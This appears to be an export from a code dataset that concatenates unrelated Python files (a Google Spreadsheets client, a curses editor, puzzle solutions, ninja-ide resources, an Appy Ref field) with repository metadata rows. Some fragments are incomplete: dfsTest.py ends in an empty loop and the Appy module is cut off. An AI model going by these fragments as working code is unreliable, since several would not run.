self.spr_client.email = gmailUsername
self.spr_client.password = gmailPassword
self.spr_client.source = sSourceName
self.spr_client.http_client.debug = bDebug
self.spr_client.ProgrammaticLogin()
def ExposeClient(self):
""" Exposes the Google spreadsheets client in case you need to do anything further to it """
return self.spr_client
def CreateTableHeaders(self,sSpreadsheetKey,sWorksheetId,aHeaders):
""" Adds table header row """
self.log.info('Adding headers to worksheet '+sWorksheetId)
self.log.debug(aHeaders)
for i, header in enumerate(aHeaders):
i = i+1
self.log.debug('%s - %s' % (i, header))
self.spr_client.UpdateCell(row=1, col=i, inputValue=header, key=sSpreadsheetKey, wksht_id=sWorksheetId)
self.log.info('Headers added ok')
def EscapeHeader(self,header):
"""Makes a header that gdocs can deal with """
header = header.lower()
#header = re.sub('[\s_]+','-',header)
header = re.sub('[^0-9a-z-]+','',header)
return(header)
def CreateTable(self,sSpreadsheetKey,sWorksheetId,aRows):
""" Creates a new table from scratch """
self.log.info('Creating a new table on worksheet %s',sWorksheetId)
aHeaders = []
for key, value in aRows[0].items():
aHeaders.append(self.EscapeHeader(key))
self.CreateTableHeaders(sSpreadsheetKey,sWorksheetId,aHeaders)
i = 0
for row in aRows:
dRow = {}
for key, value in row.items():
dRow[self.EscapeHeader(key)] = str(value)
self.log.debug(dRow)
self.spr_client.InsertRow(dRow,sSpreadsheetKey,wksht_id=sWorksheetId)
i += 1
self.log.info('%s rows added',i)
def GetGoogleWorksheets(self,sSpreadsheetKey):
""" Gets the tabs of the spreadsheet """
self.log.info('Getting worksheets')
fWorksheets = self.spr_client.GetWorksheetsFeed(sSpreadsheetKey)
dWorksheets = {}
dWorksheets2 = {}
for i, entry in enumerate(fWorksheets.entry):
wid = entry.id.text.split('/')[-1]
name = entry.title.text
dWorksheets[wid] = name
dWorksheets2[name] = wid
ret = {'worksheets_by_id': dWorksheets,'worksheets_by_name': dWorksheets2}
self.log.info(ret)
return ret
def EmptyGoogleWorksheet(self,sSpreadsheetKey,sWorksheetId):
""" Nukes the worksheet in question from orbit """
self.log.info('Emptying worksheet ' + sWorksheetId)
batch = gdata.spreadsheet.SpreadsheetsCellsFeed()
fWorksheetCellsFeed = self.spr_client.GetCellsFeed(key=sSpreadsheetKey,wksht_id=sWorksheetId)
for i, entry in enumerate(fWorksheetCellsFeed.entry):
entry.cell.inputValue = ''
batch.AddUpdate(fWorksheetCellsFeed.entry[i])
self.spr_client.ExecuteBatch(batch, fWorksheetCellsFeed.GetBatchLink().href)
def GetHeadersFromWorksheet(self,sSpreadsheetKey,sWorksheetId):
"""Gets the headers from a worksheet"""
headers = []
feed = self.spr_client.GetCellsFeed(sSpreadsheetKey,sWorksheetId)
for i, entry in enumerate(feed.entry):
#iterate through the cells feed until the second row, taking the cell contents as headers
if int(entry.cell.row) >= 2:
break
headers.append(self.EscapeHeader(entry.content.text))
return(headers)
def GetRowsFromWorksheet(self,sSpreadsheetKey,sWorksheetId):
"""Gets the rows from a worksheet"""
headers = self.GetHeadersFromWorksheet(sSpreadsheetKey,sWorksheetId)
rows = []
feed = self.spr_client.GetListFeed(key=sSpreadsheetKey,wksht_id=sWorksheetId)
for i, entry in enumerate(feed.entry):
row = OrderedDict()
row['id'] = i
for header in headers:
row[header] = entry.custom[header].text
rows.append(row)
return(rows)
def PutRowsIntoWorksheet(self,sSpreadsheetKey,sWorksheetId,aRows):
"""Appeands a row to a worksheet"""
for dRow in aRows:
entry = self.spr_client.InsertRow(dRow,sSpreadsheetKey,sWorksheetId)
|
UTF-8
|
Python
| false | false | 2,014 |
11,244,224,418,851 |
47febad3c887d05cf232ceff27f777938a99a400
|
732305d7fc721d0090e465bda635592f3f5e1ae7
|
/pad/pad
|
5361a009f1d92ff0a1535d4c23600542ed4c18b6
|
[
"GPL-3.0-only"
] |
non_permissive
|
cheery/language
|
https://github.com/cheery/language
|
8e2711c8f6079d2d85ea09f19bc748b9d7649cbb
|
629bfc722f5c7f64ceb786ea825dda1dc3a86ef8
|
refs/heads/master
| 2021-01-10T22:11:50.502117 | 2014-09-02T14:03:45 | 2014-09-02T14:03:45 | 19,088,666 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python3
import curses
from codecard import *
high = 1 << 32
tabsize = 4
def main(screen):
curses.cbreak()
curses.noecho()
curses.meta(1)
screen.keypad(0)
card = Card()
#pad = Pad(Card(), motion, "pad")
key = ''
#while pad.modes:
#pad.modes[-1](screen, pad)
while key != '\x1b':
draw(screen, card, repr(key))
key = screen.getkey()
if key == '\n':
card.put(card.bot, TextLineBuffer(None, Line(), [], Line()))
else:
card.put(card.bot, TextBuffer(None, list(key)))
def draw(screen, card, message):
height, width = screen.getmaxyx()
screen.clear()
for i, line in enumerate(card.lines):
screen.addstr(i, line.indent * tabsize, ''.join(line.text))
screen.addstr(height-1, 0, message)
# screen.move(y, x)
screen.refresh()
#def motion(screen, pad):
# card = pad.card
# #card.y = clamp(card.y, 0, len(card.lines) - 1)
# #card.x = clamp(card.x, 0, len(card.line) - 1)
# draw(screen, card, pad.message, card.head, card.y)
# pad.message = ''
# text = screen.getkey()
# if text == '\x1b':
# pad.modes.pop(-1)
# elif text == 'i':
# pad.modes.append(insert)
# elif text == 'I':
# card.x = 0
# pad.modes.append(insert)
# elif text == 'a':
# card.x = card.head + 1
# pad.modes.append(insert)
# elif text == 'A':
# card.x = high
# pad.modes.append(insert)
# elif text == '0':
# card.x = 0
# elif text == '$':
# card.x = high
# elif text == 'h' and card.head > card.line.base:
# card.x = card.head - 1
# elif text == '\x7f' and card.head > card.line.base:
# card.x = card.head - 1
# elif text == '\x7f' and card.y > 0:
# card.x = len(card.line)
# card.y -= 1
# elif text == 'l' and card.head < card.line.tail - 1:
# card.x = card.head + 1
# elif text == 'j' or text == '\n':
# card.y = clamp(card.y+1, 0, len(card.lines) - 1)
# elif text == 'J' and card.y + 1 < len(card.lines):
# card.x = card.join_line(card.y)
# elif text == 'k':
# card.y = clamp(card.y-1, 0, len(card.lines) - 1)
# elif text == 'A':
# card.x = len(card.line)
# pad.modes.append(insert)
# elif text == 'o':
# card.y = card.insert_line(card.y+1, Line('', card.line.indent))
# card.x = 0
# pad.modes.append(insert)
# elif text == 'O':
# card.y = card.insert_line(card.y, Line('', card.line.indent))
# card.x = 0
# pad.modes.append(insert)
# elif text == '<' and card.line.indent > 0:
# card.line.indent -= 1
# elif text == '>':
# card.line.indent += 1
# elif text == '_':
# card.x = card.line.base
# elif text == 'x':
# card.line.remove(card.head)
# elif text == 'd':
# card.lines.pop(card.y)
# if len(card.lines) == 0:
# card.lines.append(Line(''))
# card.y = clamp(card.y, 0, len(card.lines) - 1)
#
#def insert(screen, pad):
# card = pad.card
# draw(screen, card, '-- insert --' + pad.message, card.index, card.y)
# text = screen.getkey()
# if text == '\x1b':
# pad.modes.pop(-1)
# elif text == '\x7f' and card.index > card.line.base:
# index = card.index - 1
# card.x = index
# card.line.remove(index)
# elif text == '\x7f' and card.index > 0:
# card.line.indent -= 1
# card.x = card.line.base
# elif text == '\x7f' and card.index == 0 and card.y > 0:
# card.x = card.join_line(card.y-1)
# card.y = card.y - 1
# elif text == '\n':
# card.lines[card.y], tail = card.line.split(card.index)
# card.y = card.insert_line(card.y+1, tail)
# card.x = card.line.base
# elif text == '\t':
# base = card.line.base
# card.line.indent += 1
# card.x = card.index + card.line.base - base
# else:
# card.x = card.line.insert(card.index, text)
# pad.message = repr(text)
#
#
#class Pad:
# def __init__(self, card, mode, message):
# self.card = card
# self.modes = [mode]
# self.message = message
#
#class Card:
# def __init__(self, lines=None, x=0, y=0):
# self.lines = lines or [Line()]
# self.x = x
# self.y = y
#
# @property
# def index(self):
# return clamp(self.x, self.line.base, self.line.tail)
#
# @property
# def head(self):
# return clamp(self.x, self.line.base, self.line.tail-1)
#
# @property
# def line(self):
# assert 0 <= self.y <= len(self.lines)
# return self.lines[self.y]
#
# def insert_line(self, y, line):
# assert isinstance(line, Line)
# self.lines.insert(y, line)
# return y
#
# def remove_line(self, y):
# return self.lines.pop(y)
#
# def join_line(self, y):
# i = self.lines[y].tail
# self.lines[y] += self.lines.pop(y+1)
# return i
#
#class Line:
# def __init__(self, text='', indent=0):
# self.text = text
# self.indent = indent
#
# @property
# def base(self):
# return self.indent * tabsize
#
# @property
# def tail(self):
# return self.indent * tabsize + len(self.text)
#
# def insert(self, i, text):
# i -= self.base
# assert 0 <= i <= len(self.text)
# self.text = self.text[:i] + text + self.text[i:]
# return i + len(text) + self.base
#
# def remove(self, i, length=1):
# i -= self.base
# assert 0 <= i <= len(self.text)
# text = self.text[i:i+length]
# self.text = self.text[:i] + self.text[i+length:]
# return text
#
# def split(self, i):
# i -= self.base
# head = Line(self.text[:i], self.indent)
# tail = Line(self.text[i:], self.indent)
# return head, tail
#
# def __add__(self, other):
# return Line(self.text + other.text, self.indent)
def clamp(x, mi, ma):
return max(mi, min(ma, x))
if __name__=='__main__':
curses.wrapper(main)
|
UTF-8
|
Python
| false | false | 2,014 |
19,464,791,808,354 |
f6972e938773dc59d2793158092ce706fed4e20e
|
65f4901a2cc52a1d44199a4825b46541d29425f5
|
/snapchat_fs/__init__.py
|
abbfe4c1064ae341e4fa5e43c5aa86e40f4b2053
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Aaron1011/snapchat-fs
|
https://github.com/Aaron1011/snapchat-fs
|
f94f31d7930b0937c958d33397aef410d804df72
|
34a763bb0a57b11b6a4a5804014493258d0fb494
|
refs/heads/master
| 2023-03-11T02:37:16.102618 | 2013-12-27T09:38:52 | 2013-12-27T09:38:52 | 15,534,953 | 0 | 0 |
MIT
| true | 2023-02-23T00:16:40 | 2013-12-30T19:35:40 | 2014-01-09T21:49:10 | 2023-02-23T00:16:40 | 130 | 0 | 0 | 1 |
Python
| false | false |
from snapchatfs import list_all_downloadable_sfs_files, download_all_sfs, download_by_id, upload_sfs_file
|
UTF-8
|
Python
| false | false | 2,013 |
1,872,605,764,681 |
ed8e92843bb84e1b1d90d098fe8661ebe6d3e8f2
|
eeaba1d58896d44fcce20df42633ab7df204491c
|
/project_euler/prob56.py
|
b42baac1dbaf1b13f24a00231086c96673e379a3
|
[
"GPL-3.0-only"
] |
non_permissive
|
BenLand100/ScratchCode
|
https://github.com/BenLand100/ScratchCode
|
9d014164074b59859df3bd005df0428766c0421e
|
fd8c02247a19f81d25065af43ba1e8d943a588b0
|
refs/heads/master
| 2021-01-13T02:17:59.532211 | 2011-03-23T02:12:26 | 2011-03-23T02:12:26 | 1,277,431 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
def sum_digits(x):
val = 0
while x > 0:
val += x % 10
x /= 10
return val
print sorted([sum_digits(a**b) for a in range(100) for b in range(100)])[-1]
|
UTF-8
|
Python
| false | false | 2,011 |
14,860,586,863,631 |
234aae8c2a5189da05c68559d06a455aabefcd04
|
b5324f1a14dc5757ce5cc0027d09078e7335f55d
|
/selftest/dir2/skipall.py
|
9ad6a348d14bbd324af925a8ddf54b808afc763b
|
[
"BSD-2-Clause"
] |
permissive
|
depp/idiotest
|
https://github.com/depp/idiotest
|
70d09fef8f9467ab2aa468afb71767270d1cd4f0
|
44c4c647b340625634931e4222482052343b369a
|
refs/heads/master
| 2021-01-13T01:26:50.259368 | 2012-01-12T00:03:22 | 2012-01-12T00:03:33 | 3,117,560 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright 2012 Dietrich Epp <[email protected]>
# See LICENSE.txt for details.
@test
def failure():
fail()
skip_module()
|
UTF-8
|
Python
| false | false | 2,012 |
9,689,446,244,081 |
5643446fb29a6466c9b7caa2e9148d0102434c80
|
2d9e95a2b5c40e229438d14fb62aea46e423624f
|
/dfsTest.py
|
2a42962e30c27641cb4c75da3b6a41a71ac29082
|
[] |
no_license
|
IhsanE/Algorithms
|
https://github.com/IhsanE/Algorithms
|
dc3fb41d8e63ffc74287ddd0c6476b54adf8daf8
|
6173d1df1af0a5cef16ca34fa8101b30ffa9d0e7
|
refs/heads/master
| 2021-01-20T12:04:20.455942 | 2014-04-12T15:57:35 | 2014-04-12T15:57:35 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def dfs(G,s):
parent={s:None}
frontier=[s]
while (frontier):
v=frontier.pop()
for i in G[v]:
if i not in parent:
parent[i]=v
frontier.append(i)
return parent
#goal=int(raw_input())
# str = n c
def factor(n):
factors=[1,n]
for i in xrange(2,n/2+1):
if n%i==0:
factors.append(i)
return factors
print factor(1)
G={}
G[1]=factor(1)
for i in xrange(5):
|
UTF-8
|
Python
| false | false | 2,014 |
9,586,367,034,027 |
49069323b7f59ed7b81ad80c3499ad95f00d7225
|
97b65e28bb6a202108acfd9d069aad185a6e126c
|
/TKINTER/ninja-ide/resources.py
|
8cd2a4174ef8dc1cecb3b22d6725bbfdfe870448
|
[] |
no_license
|
calpe20/PYTHONIZANDO
|
https://github.com/calpe20/PYTHONIZANDO
|
7f217a5d03aca18307acc0c672dbe30393cc4c63
|
4899fc150596b11dfe33c5da2f0de4b2458a0dac
|
refs/heads/master
| 2020-04-22T13:44:41.239647 | 2013-06-14T00:19:08 | 2013-06-14T00:19:08 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#-*-coding:utf-8-*-
import os, sys
OS_VERSION = sys.version
OS_KEY = 'Cmd' if 'Apple' in OS_VERSION else 'Ctrl'
PRJ_PATH = os.path.abspath(os.path.dirname(__file__))
createpath = os.path.join
images = {
'splash': os.path.join(PRJ_PATH, 'img', 'splash.png'),
'icon': os.path.join(PRJ_PATH, 'img', 'icon.png'),
'new': os.path.join(PRJ_PATH, 'img', 'document-new.png'),
'newProj': os.path.join(PRJ_PATH, 'img', 'project-new.png'),
'open': os.path.join(PRJ_PATH, 'img', 'document-open.png'),
'openProj': os.path.join(PRJ_PATH, 'img', 'project-open.png'),
'openFolder': os.path.join(PRJ_PATH, 'img', 'folder-open.png'),
'save': os.path.join(PRJ_PATH, 'img', 'document-save.png'),
'saveAs': os.path.join(PRJ_PATH, 'img', 'document-save-as.png'),
'saveAll': os.path.join(PRJ_PATH, 'img', 'document-save-all.png'),
'copy': os.path.join(PRJ_PATH, 'img', 'edit-copy.png'),
'cut': os.path.join(PRJ_PATH, 'img', 'edit-cut.png'),
'paste': os.path.join(PRJ_PATH, 'img', 'edit-paste.png'),
'redo': os.path.join(PRJ_PATH, 'img', 'edit-redo.png'),
'undo': os.path.join(PRJ_PATH, 'img', 'edit-undo.png'),
'find': os.path.join(PRJ_PATH, 'img', 'find.png'),
'findReplace': os.path.join(PRJ_PATH, 'img', 'find-replace.png'),
'play': os.path.join(PRJ_PATH, 'img', 'play.png'),
'stop': os.path.join(PRJ_PATH, 'img', 'stop.png'),
'file-run': os.path.join(PRJ_PATH, 'img', 'file-run.png'),
'debug': os.path.join(PRJ_PATH, 'img', 'debug.png'),
'designer': os.path.join(PRJ_PATH, 'img', 'qtdesigner.png'),
'bug': os.path.join(PRJ_PATH, 'img', 'bug.png'),
'function': os.path.join(PRJ_PATH, 'img', 'function.png'),
'module': os.path.join(PRJ_PATH, 'img', 'module.png'),
'class': os.path.join(PRJ_PATH, 'img', 'class.png'),
'attribute': os.path.join(PRJ_PATH, 'img', 'attribute.png'),
'web': os.path.join(PRJ_PATH, 'img', 'web.png'),
'splitH': os.path.join(PRJ_PATH, 'img', 'split-horizontal.png'),
'splitV': os.path.join(PRJ_PATH, 'img', 'split-vertical.png'),
'splitCRotate': os.path.join(PRJ_PATH, 'img', 'panels-change-position.png'),
'splitMRotate': os.path.join(PRJ_PATH, 'img', 'panels-change-vertical-position.png'),
'indent-less': os.path.join(PRJ_PATH, 'img', 'indent-less.png'),
'indent-more': os.path.join(PRJ_PATH, 'img', 'indent-more.png'),
'console': os.path.join(PRJ_PATH, 'img', 'console.png'),
'pref': os.path.join(PRJ_PATH, 'img', 'preferences-system.png'),
'tree-app': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-app.png'),
'tree-code': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-code.png'),
'tree-folder': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-folder.png'),
'tree-html': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-html.png'),
'tree-generic': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-generic.png'),
'tree-css': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-CSS.png'),
'tree-java': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-java.png'),
'tree-python': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-python.png'),
'tree-image': os.path.join(PRJ_PATH, 'img', 'tree', 'project', 'tree-image.png'),
'comment-code': os.path.join(PRJ_PATH, 'img', 'comment-code.png'),
'uncomment-code': os.path.join(PRJ_PATH, 'img', 'uncomment-code.png'),
'reload-file': os.path.join(PRJ_PATH, 'img', 'reload-file.png'),
}
syntax_files = os.path.join(PRJ_PATH, 'plugins', 'syntax')
plugins = os.path.join(PRJ_PATH, 'plugins')
start_page_url = os.path.join(PRJ_PATH, 'doc', 'startPage.html')
descriptor = os.path.join(PRJ_PATH, 'plugins', 'descriptor.json')
twits = os.path.join(PRJ_PATH, 'doc','twit_posts.txt')
bugs_page = 'http://code.google.com/p/ninja-ide/issues/list'
|
UTF-8
|
Python
| false | false | 2,013 |
7,224,135,034,814 |
59f0d6a9106a70d7ff29ff555bad29dda8dc82fa
|
9db31c94158759485ac9e5163a02f8d3b0d4ae72
|
/src/bv/server/api/resource.py
|
c01491e851e46c2017ffae2fb15126d478fa77f5
|
[] |
no_license
|
gpierre42/bv.server
|
https://github.com/gpierre42/bv.server
|
a8b99ee34ad0302d3e836114dbde25934526991c
|
3d1081011d1bfb103bca2ce7698e24425da494cf
|
refs/heads/master
| 2021-01-14T14:03:09.931251 | 2010-11-26T15:25:58 | 2010-11-26T15:25:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from piston.resource import Resource as PistonResource
from piston.utils import rc
import json
class Resource(PistonResource):
def form_validation_response(self, e):
resp = rc.BAD_REQUEST
resp.write(' ' + dict(e.form.errors.items()).__str__())
return resp
|
UTF-8
|
Python
| false | false | 2,010 |
6,279,242,208,642 |
f85b4e0669f347f675b52a663d1c1ec36058c686
|
652c79428e003a31ec02afe66f6944708093ed45
|
/GCJ_2009/Round2-A/main.py
|
d0095b45f1f0670cf6d1974704b866847758c65b
|
[] |
no_license
|
saitodev/py-practice
|
https://github.com/saitodev/py-practice
|
c3c08de4c5c802dea7859099651708e63f2acda5
|
da0ed7c7b16cdec5a9e7acd469b05955c4c4d880
|
refs/heads/master
| 2016-09-06T06:53:52.420997 | 2014-10-13T07:45:34 | 2014-10-13T07:45:34 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def count_one(s):
result = 0
for i, c in enumerate(s, start=1):
if c == '1':
result = i
return result
def solve(n, rows):
ans = 0
for i in xrange(n):
for j in xrange(i, n):
if rows[j] <= i + 1:
rows[i], rows[i+1:j+1] = rows[j], rows[i:j]
ans += j - i
break
return ans
def main():
t = int(raw_input())
for i in xrange(1, t+1):
n = int(raw_input())
rows = [count_one(raw_input()) for _ in xrange(n)]
print "Case #%d: %d" % (i, solve(n, rows))
if __name__ == '__main__':
main()
|
UTF-8
|
Python
| false | false | 2,014 |
18,691,697,686,474 |
66116529a6a8be3a0d2e196d4d037d38bb09f816
|
42866c294c8efef883e77ee27d786686ef880f9e
|
/appy/fields/ref.py
|
10592588f1ded3a938402d10b45d6a657671768d
|
[
"GPL-3.0-only"
] |
non_permissive
|
jeffbayes/django-sis
|
https://github.com/jeffbayes/django-sis
|
c6b45464096f007d8f5400365cbcf2824b52d1da
|
b9290799f4835a8ffc2178f10ae7ec8d3261aa90
|
refs/heads/master
| 2021-01-21T07:16:39.154955 | 2014-02-14T21:01:45 | 2014-02-14T21:01:45 | 16,302,019 | 1 | 0 | null | true | 2014-02-14T21:01:46 | 2014-01-28T04:22:42 | 2014-02-14T21:01:45 | 2014-02-14T21:01:45 | 22,208 | 0 | 0 | 0 |
Python
| null | null |
# ------------------------------------------------------------------------------
# This file is part of Appy, a framework for building applications in the Python
# language. Copyright (C) 2007 Gaetan Delannay
# Appy is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 3 of the License, or (at your option) any later
# version.
# Appy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with
# Appy. If not, see <http://www.gnu.org/licenses/>.
# ------------------------------------------------------------------------------
import sys, re
from appy.fields import Field, No
from appy.px import Px
from appy.gen.layout import Table
from appy.gen import utils as gutils
from appy.shared import utils as sutils
# ------------------------------------------------------------------------------
class Ref(Field):
# Some default layouts. "w" stands for "wide": those layouts produce tables
# of Ref objects whose width is 100%.
wLayouts = Table('lrv-f', width='100%')
# "d" stands for "description": a description label is added.
wdLayouts = {'view': Table('l-d-f', width='100%')}
# This PX displays the title of a referenced object, with a link on it to
# reach the consult view for this object. If we are on a back reference, the
# link allows to reach the correct page where the forward reference is
# defined. If we are on a forward reference, the "nav" parameter is added to
# the URL for allowing to navigate from one object to the next/previous on
# ui/view.
pxObjectTitle = Px('''
<x var="navInfo='ref.%s.%s:%s.%d.%d' % (zobj.UID(), field.name, \
field.pageName, loop.ztied.nb + startNumber, totalNumber);
navInfo=not field.isBack and navInfo or '';
cssClass=ztied.getCssFor('title')">
<x>::ztied.getSupTitle(navInfo)</x>
<a var="pageName=field.isBack and field.back.pageName or 'main';
fullUrl=ztied.getUrl(page=pageName, nav=navInfo)"
href=":fullUrl" class=":cssClass">:(not includeShownInfo) and \
ztied.Title() or field.getReferenceLabel(ztied.appy())
</a><span name="subTitle" style=":showSubTitles and 'display:inline' or \
'display:none'">::ztied.getSubTitle()"</span>
</x>''')
# This PX displays icons for triggering actions on a given referenced object
# (edit, delete, etc).
pxObjectActions = Px('''
<table class="noStyle" var="isBack=field.isBack">
<tr>
<!-- Arrows for moving objects up or down -->
<td if="not isBack and (len(zobjects)>1) and changeOrder and canWrite"
var2="objectIndex=field.getIndexOf(zobj, ztied);
ajaxBaseCall=navBaseCall.replace('**v**','%s,%s,{%s:%s,%s:%s}'%\
(q(startNumber), q('ChangeRefOrder'), q('refObjectUid'),
q(ztied.UID()), q('move'), q('**v**')))">
<img if="objectIndex > 0" class="clickable" src=":url('arrowUp')"
title=":_('move_up')"
onclick=":ajaxBaseCall.replace('**v**', 'up')"/>
<img if="objectIndex < (totalNumber-1)" class="clickable"
src=":url('arrowDown')" title=":_('move_down')"
onclick=":ajaxBaseCall.replace('**v**', 'down')"/>
</td>
<!-- Workflow transitions -->
<td if="ztied.showTransitions('result')"
var2="targetObj=ztied">:targetObj.appy().pxTransitions</td>
<!-- Edit -->
<td if="not field.noForm and ztied.mayEdit() and field.delete">
<a var="navInfo='ref.%s.%s:%s.%d.%d' % (zobj.UID(), field.name, \
field.pageName, loop.ztied.nb+startNumber, totalNumber)"
href=":ztied.getUrl(mode='edit', page='main', nav=navInfo)">
<img src=":url('edit')" title=":_('object_edit')"/></a>
</td>
<!-- Delete -->
<td if="not isBack and field.delete and canWrite and ztied.mayDelete()">
<img class="clickable" title=":_('object_delete')" src=":url('delete')"
onclick=":'onDeleteObject(%s)' % q(ztied.UID())"/>
</td>
<!-- Unlink -->
<td if="not isBack and field.unlink and canWrite">
<img class="clickable" title=":_('object_unlink')" src=":url('unlink')"
onclick=":'onUnlinkObject(%s,%s,%s)' % (q(zobj.UID()), \
q(field.name), q(ztied.UID()))"/>
</td>
</tr>
</table>''')
# Displays the button allowing to add a new object through a Ref field, if
# it has been declared as addable and if multiplicities allow it.
pxAdd = Px('''
<input if="showPlusIcon" type="button" class="button"
var2="navInfo='ref.%s.%s:%s.%d.%d' % (zobj.UID(), \
field.name, field.pageName, 0, totalNumber);
formCall='goto(%s)' % \
q('%s/do?action=Create&className=%s&nav=%s' % \
(folder.absolute_url(), linkedPortalType, navInfo));
formCall=not field.addConfirm and formCall or \
'askConfirm(%s,%s,%s)' % (q('script'), q(formCall), \
q(addConfirmMsg));
noFormCall=navBaseCall.replace('**v**', \
'%d,%s' % (startNumber, q('CreateWithoutForm')));
noFormCall=not field.addConfirm and noFormCall or \
'askConfirm(%s, %s, %s)' % (q('script'), q(noFormCall), \
q(addConfirmMsg))"
style=":url('buttonAdd', bg=True)" value=":_('add_ref')"
onclick=":field.noForm and noFormCall or formCall"/>''')
# This PX displays, in a cell header from a ref table, icons for sorting the
# ref field according to the field that corresponds to this column.
pxSortIcons = Px('''
<x if="changeOrder and canWrite and ztool.isSortable(field.name, \
zobjects[0].meta_type, 'ref')"
var2="ajaxBaseCall=navBaseCall.replace('**v**', '%s,%s,{%s:%s,%s:%s}'% \
(q(startNumber), q('SortReference'), q('sortKey'), \
q(field.name), q('reverse'), q('**v**')))">
<img class="clickable" src=":url('sortAsc')"
onclick=":ajaxBaseCall.replace('**v**', 'False')"/>
<img class="clickable" src=":url('sortDesc')"
onclick=":ajaxBaseCall.replace('**v**', 'True')"/>
</x>''')
# This PX is called by a XmlHttpRequest (or directly by pxView) for
# displaying the referred objects of a reference field.
pxViewContent = Px('''
<div var="field=zobj.getAppyType(req['fieldName']);
innerRef=req.get('innerRef', False) == 'True';
ajaxHookId=zobj.UID() + field.name;
startNumber=int(req.get('%s_startNumber' % ajaxHookId, 0));
info=field.getLinkedObjects(zobj, startNumber);
zobjects=info.objects;
totalNumber=info.totalNumber;
batchSize=info.batchSize;
batchNumber=len(zobjects);
folder=zobj.getCreateFolder();
linkedPortalType=ztool.getPortalType(field.klass);
canWrite=not field.isBack and zobj.allows(field.writePermission);
showPlusIcon=zobj.mayAddReference(field.name);
atMostOneRef=(field.multiplicity[1] == 1) and \
(len(zobjects)<=1);
addConfirmMsg=field.addConfirm and \
_('%s_addConfirm' % field.labelId) or '';
navBaseCall='askRefField(%s,%s,%s,%s,**v**)' % \
(q(ajaxHookId), q(zobj.absolute_url()), \
q(field.name), q(innerRef));
changeOrder=field.changeOrderEnabled(zobj);
showSubTitles=req.get('showSubTitles', 'true') == 'true'"
id=":ajaxHookId">
<!-- The definition of "atMostOneRef" above may sound strange: we
shouldn't check the actual number of referenced objects. But for
back references people often forget to specify multiplicities. So
concretely, multiplicities (0,None) are coded as (0,1). -->
<!-- Display a simplified widget if at most 1 referenced object. -->
<table if="atMostOneRef">
<tr valign="top">
<!-- If there is no object -->
<x if="not zobjects">
<td class="discreet">:_('no_ref')</td>
<td>:field.pxAdd</td>
</x>
<!-- If there is an object -->
<x if="zobjects">
<td for="ztied in zobjects"
var2="includeShownInfo=True">:field.pxObjectTitle</td>
</x>
</tr>
</table>
<!-- Display a table in all other cases -->
<x if="not atMostOneRef">
<div if="not innerRef or showPlusIcon" style="margin-bottom: 4px">
(<x>:totalNumber</x>)
<x>:field.pxAdd</x>
<!-- The search button if field is queryable -->
<input if="zobjects and field.queryable" type="button" class="button"
style=":url('buttonSearch', bg=True)" value=":_('search_title')"
onclick=":'goto(%s)' % \
q('%s/ui/search?className=%s&ref=%s:%s' % \
(ztool.absolute_url(), linkedPortalType, zobj.UID(), \
field.name))"/>
</div>
<!-- Appy (top) navigation -->
<x>:obj.pxAppyNavigate</x>
<!-- No object is present -->
<p class="discreet" if="not zobjects">:_('no_ref')</p>
<table if="zobjects" class=":innerRef and 'innerAppyTable' or ''"
width="100%">
<tr valign="bottom">
<td>
<!-- Show forward or backward reference(s) -->
<table class="not innerRef and 'list' or ''"
width=":innerRef and '100%' or field.layouts['view']['width']"
var="columns=zobjects[0].getColumnsSpecifiers(\
field.shownInfo, dir)">
<tr if="field.showHeaders">
<th for="column in columns" width=":column['width']"
align="column['align']"
var2="field=column['field']">
<span>:_(field.labelId)</span>
<x>:field.pxSortIcons</x>
<x var="className=linkedPortalType">:obj.pxShowDetails</x>
</th>
</tr>
<tr for="ztied in zobjects" valign="top"
class=":loop.ztied.odd and 'even' or 'odd'">
<td for="column in columns"
width=":column['width']" align=":column['align']"
var2="field=column['field']">
<!-- The "title" field -->
<x if="python: field.name == 'title'">
<x>:field.pxObjectTitle</x>
<div if="ztied.mayAct()">:field.pxObjectActions</div>
</x>
<!-- Any other field -->
<x if="field.name != 'title'">
<x var="zobj=ztied; obj=ztied.appy(); layoutType='cell';
innerRef=True"
if="zobj.showField(field.name, \
layoutType='result')">:field.pxView</x>
</x>
</td>
</tr>
</table>
</td>
</tr>
</table>
<!-- Appy (bottom) navigation -->
<x>:obj.pxAppyNavigate</x>
</x>
</div>''')
pxView = pxCell = Px('''
<x var="x=req.set('fieldName', field.name)">:field.pxViewContent</x>''')
pxEdit = Px('''
<select if="field.link"
var2="requestValue=req.get(name, []);
inRequest=req.has_key(name);
zobjects=field.getSelectableObjects(obj);
uids=[o.UID() for o in \
field.getLinkedObjects(zobj).objects];
isBeingCreated=zobj.isTemporary()"
name=":name" size="isMultiple and field.height or ''"
multiple="isMultiple and 'multiple' or ''">
<option value="" if="not isMultiple">:_('choose_a_value')"></option>
<option for="ztied in zobjects" var2="uid=ztied.o.UID()"
selected=":inRequest and (uid in requestValue) or \
(uid in uids)"
value=":uid">:field.getReferenceLabel(ztied)</option>
</select>''')
pxSearch = Px('''<x>
<label lfor=":widgetName">:_(field.labelId)"></label><br/>
<!-- The "and" / "or" radio buttons -->
<x if="field.multiplicity[1] != 1"
var2="operName='o_%s' % name;
orName='%s_or' % operName;
